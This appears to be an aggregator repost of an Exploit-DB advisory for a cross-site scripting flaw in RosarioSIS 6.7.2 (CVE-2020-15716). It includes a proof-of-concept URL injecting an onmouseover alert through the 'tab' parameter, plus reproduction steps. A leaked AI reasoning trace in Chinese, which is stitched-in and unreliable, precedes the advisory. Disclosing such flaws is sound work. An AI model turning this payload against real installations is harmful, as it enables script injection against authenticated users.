[webapps] RosarioSIS 6.7.2 - Cross Site Scripting (XSS)

[webapps] RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
好的，我现在需要帮用户总结一篇文章的内容，控制在100字以内。首先，我得仔细阅读用户提供的文章内容。文章标题是“RosarioSIS 6.7.2 - Cross Site Scripting (XSS)”，看起来这是一个关于跨站脚本攻击的漏洞。接下来，文章提到了漏洞的作者、发布日期、软件链接、版本等信息。然后是POC链接，展示了如何触发这个XSS漏洞。条件部分指出用户必须经过身份验证，并且请求中不能包含modfunc参数。步骤部分说明了如何复现这个漏洞：登录为管理员，发送请求，观察结果。现在我需要把这些信息浓缩成一句话。重点包括软件名称、漏洞类型、触发条件和影响。所以，我应该提到RosarioSIS 6.7.2版本存在XSS漏洞，通过特定URL触发，在用户认证且无modfunc参数的情况下导致脚本执行。最后，确保语言简洁明了，不超过100字。检查一下是否有遗漏的重要信息，比如影响范围或CVE编号，但可能不需要在总结中包含这些细节。 </think> RosarioSIS 6.7.2 存在跨站脚本（XSS）漏洞，攻击者可通过特定 URL 在用户认证且无 `modfunc` 参数的情况下触发脚本执行。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:5 收藏

# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:  
1. User must be authenticated (as shown by the session checks in `Warehous.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result

文章来源: https://www.exploit-db.com/exploits/52450
如有侵权请联系:admin#unsafe.sh